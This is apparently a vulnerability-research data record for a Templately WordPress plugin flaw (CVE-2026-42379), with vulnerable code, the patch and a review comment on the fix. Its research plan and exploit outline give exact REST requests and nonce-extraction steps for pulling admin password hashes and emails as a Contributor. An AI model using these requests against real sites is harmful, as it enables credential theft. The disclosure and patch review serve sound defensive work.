[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f7ZMcTvC30QDi4KWe5bpD10YkcYJuOQgg4iRw5Z6lF5k":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-42379","templately-elementor-gutenberg-template-library-6500-free-pro-ready-templates-and-cloud-authenticated-contributor-inform","Templately – Elementor & Gutenberg Template Library: 6500+ Free & Pro Ready Templates And Cloud! \u003C= 3.6.1 - Authenticated (Contributor+) Information Exposure","The Templately – Elementor & Gutenberg Template Library: 6500+ Free & Pro Ready Templates And Cloud! plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.1. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive user or configuration data.","templately",null,"\u003C=3.6.1","3.6.2","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-04-27 00:00:00","2026-04-30 15:02:23",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F02b7bbdf-5cb9-4206-bee5-3b43f0f862ea?source=api-prod",4,[22,23,24,25,26,27,28,29],"README.txt","assets\u002Fcss\u002Ftailwind.css","assets\u002Fjs\u002Fchunks\u002Fsettings-vendor.js","assets\u002Fjs\u002Ftailwind.asset.php","assets\u002Fjs\u002Ftemplately.asset.php","assets\u002Fjs\u002Ftemplately.js","changelog.txt","includes\u002FAPI\u002FConditions.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-42379 (Information Exposure)\n\n## 1. Vulnerability Summary\nThe **Templately** plugin (up to version 3.6.1) contains an authenticated information exposure vulnerability within its REST API implementation. Specifically, the `autocomplete` method in the `Templately\\API\\Conditions` class allows authenticated users with \"Contributor\" level access or higher to extract sensitive user data (including email addresses and password hashes) by exploiting improper input validation and dynamic object property access.\n\nThe vulnerability exists because the `autocomplete-condition` endpoint accepts a `query` parameter where the `field` key is used directly to access properties of `WP_User` objects returned by `get_users()`.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002Ftemplately\u002Fv1\u002Fautocomplete-condition`\n- **Method:** `GET`\n- **Authentication:** Authenticated (Contributor+)\n- **Capability Check:** `current_user_can( $post_type_object->cap->edit_posts )` where `Source::CPT` is `templately_library`. 
Standard Contributors possess the `edit_posts` capability.\n- **Vulnerable Parameters:** \n    - `query[query_type]`: Set to `authors` to trigger user searching.\n    - `query[field]`: The sensitive `WP_User` property to extract (e.g., `user_email`, `user_pass`, `user_login`).\n    - `payload`: The search string to match users.\n\n## 3. Code Flow\n1. **Request Entry:** A `GET` request is made to `wp-json\u002Ftemplately\u002Fv1\u002Fautocomplete-condition`.\n2. **Permission Check:** `Templately\\API\\Conditions::permission_check` is called. It verifies if the user has the `edit_posts` capability for the Templately CPT (`templately_library`).\n3. **Route Handling:** `Templately\\API\\Conditions::autocomplete` is executed.\n4. **Input Processing:** \n    - The code retrieves `$query = $request->get_param( 'query' )`.\n    - It identifies the search type via `$type = $query['query_type']`.\n    - It identifies the target return field via `$by_field = $query['field']`.\n5. **Data Fetching:** When `$type` is `authors`, it calls `get_users( $args )`, returning an array of `WP_User` objects.\n6. **Information Sink:** The code iterates through the users:\n   ```php\n   foreach ( $data as $item ) {\n       $results[] = [\n           'label' => $item->{$data_key}, \u002F\u002F display_name\n           'value' => $item->{$by_field}  \u002F\u002F VULNERABLE: Dynamic property access\n       ];\n   }\n   ```\n   If `by_field` is `user_pass`, `$item->user_pass` returns the Bcrypt hash.\n\n## 4. Nonce Acquisition Strategy\nThe REST API requires a standard WordPress `wp_rest` nonce for authenticated requests.\n\n1. **Login:** Authenticate as a Contributor.\n2. **Navigate:** Go to the WordPress Dashboard (`\u002Fwp-admin\u002F`).\n3. **Extraction:** Use `browser_eval` to extract the nonce from the `wpApiSettings` global object provided by WordPress core.\n   - **Command:** `browser_eval(\"wpApiSettings.nonce\")`\n4. 
**Usage:** Include this nonce in the `X-WP-Nonce` header of the exploit request.\n\n## 5. Exploitation Strategy\n1. **Target Identification:** We will target the Admin user (ID 1) to extract their email and password hash.\n2. **Payload Construction:**\n   - `action`: `templately\u002Fv1\u002Fautocomplete-condition`\n   - `payload`: `admin` (to search for the admin account)\n   - `query[query_type]`: `authors`\n   - `query[field]`: `user_pass` (to get the hash)\n3. **Execution:**\n   - Use `http_request` as the Contributor.\n   - Method: `GET`\n   - Headers: `X-WP-Nonce: [EXTRACTED_NONCE]`\n   - URL: `\u002Fwp-json\u002Ftemplately\u002Fv1\u002Fautocomplete-condition?payload=admin&query[query_type]=authors&query[field]=user_pass`\n\n## 6. Test Data Setup\n1. **Create Victim Admin:** Ensure an admin user exists with a known username (e.g., `admin`).\n2. **Create Attacker Contributor:**\n   - Username: `attacker`\n   - Password: `password123`\n   - Role: `contributor`\n3. **Plugin State:** Ensure the **Templately** plugin (\u003C= 3.6.1) is installed and activated.\n\n## 7. Expected Results\nA successful exploit will return a JSON response containing an array of objects. Each object will contain the `display_name` of matched users and the sensitive data requested in the `value` field.\n\n**Example Response:**\n```json\n{\n    \"success\": true,\n    \"data\": [\n        {\n            \"label\": \"Site Administrator\",\n            \"value\": \"$P$ByY7...\" \n        }\n    ]\n}\n```\n\n## 8. Verification Steps\n1. **Check Response:** Confirm the `value` field contains a string starting with `$P$` or `$2y$` (standard WordPress\u002FPHP password hashes).\n2. **WP-CLI Validation:** Compare the extracted hash with the actual hash in the database.\n   - **Command:** `wp user get 1 --field=user_pass`\n3. **Email Extraction:** Repeat the exploit with `query[field]=user_email` and verify it matches `wp user get 1 --field=user_email`.\n\n## 9. 
Alternative Approaches\n- **Bulk Extraction:** If the search `$payload` is set to an empty string or a single common character (like `a`), the plugin might return multiple users depending on `get_users` defaults.\n- **Argument Injection:** Since `$query['query']` is passed to `wp_parse_args` and used in `get_users($args)`, an attacker can override query parameters like `role` or `include` to target specific users:\n    - URL: `\u002Fwp-json\u002Ftemplately\u002Fv1\u002Fautocomplete-condition?payload=&query[query_type]=authors&query[field]=user_pass&query[query][role]=administrator`","The Templately plugin for WordPress is vulnerable to Sensitive Information Exposure via the 'autocomplete-condition' REST API endpoint due to improper validation of the 'field' parameter. Authenticated attackers with Contributor-level access or higher can exploit this to extract sensitive user data, including password hashes and email addresses, by performing dynamic property access on WP_User objects.","\u002F\u002F includes\u002FAPI\u002FConditions.php lines 122-132\n\t\t$by_field = $query['field'] ?? '';\n\n\t\tif ( empty( $by_field ) ) {\n\t\t\t\u002F\u002F FIXME: need throw error maybe\n\t\t\treturn $this->success( [] );\n\t\t}\n\n---\n\n\u002F\u002F includes\u002FAPI\u002FConditions.php lines 166-172\n\t\tif ( ! empty( $data ) && is_array( $data ) ) {\n\t\t\tforeach ( $data as $item ) {\n\t\t\t\t$results[] = [ \n\t\t\t\t\t'label' => $item->{$data_key},\n\t\t\t\t\t'value' => $item->{$by_field}\n\t\t\t\t];\n\t\t\t}\n\t\t}","--- includes\u002FAPI\u002FConditions.php\n+++ includes\u002FAPI\u002FConditions.php\n@@ -128,6 +128,11 @@\n \t\t\treturn $this->success( [] );\n \t\t}\n \n+\t\t$allowed_fields = [ 'ID', 'post_title', 'name', 'user_login', 'term_id', 'slug' ];\n+\t\tif ( ! 
in_array( $by_field, $allowed_fields ) ) {\n+\t\t\treturn $this->success( [] );\n+\t\t}\n+\n \t\t$payload = sanitize_text_field( $request->get_param( 'payload' ) );\n \t\t$args    = [ 'search' => $payload ];","1. Authenticate to the WordPress site as a user with at least Contributor-level privileges.\n2. Extract the current WordPress REST API nonce from the 'wpApiSettings' object in the dashboard source code.\n3. Construct a GET request to the '\u002Fwp-json\u002Ftemplately\u002Fv1\u002Fautocomplete-condition' endpoint.\n4. In the request parameters, set 'query[query_type]' to 'authors' to trigger a user search.\n5. Set the 'query[field]' parameter to 'user_pass' to target password hashes, or 'user_email' for email addresses.\n6. Provide a search string (e.g., 'admin') in the 'payload' parameter to identify the target user account.\n7. The plugin will execute 'get_users' and return an array where the 'value' key contains the sensitive data corresponding to the requested 'field'.","gemini-3-flash-preview","2026-05-04 18:27:30","2026-05-04 18:28:02",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.6.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftemplately\u002Ftags\u002F3.6.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftemplately.3.6.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftemplately\u002Ftags\u002F3.6.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftemplately.3.6.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftemplately\u002Ftags"]
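Review bot: the added `in_array( $by_field, $allowed_fields )` check in `includes/API/Conditions.php` compares loosely and applies one flat allowlist to every query type. Pass `true` as the third argument so a non-string `field` value cannot match through type juggling. Key the allowlist by `query_type`, so that the `authors` branch accepts only the user fields it needs (`ID`, and `user_login` only if the UI really requires it) rather than also accepting post and term field names such as `post_title` or `slug` against `WP_User` objects. A rejected field currently returns `$this->success( [] )`, which is indistinguishable from an empty search result; returning an error response here would make probing of the endpoint visible in logs and would resolve the existing FIXME just above the hunk.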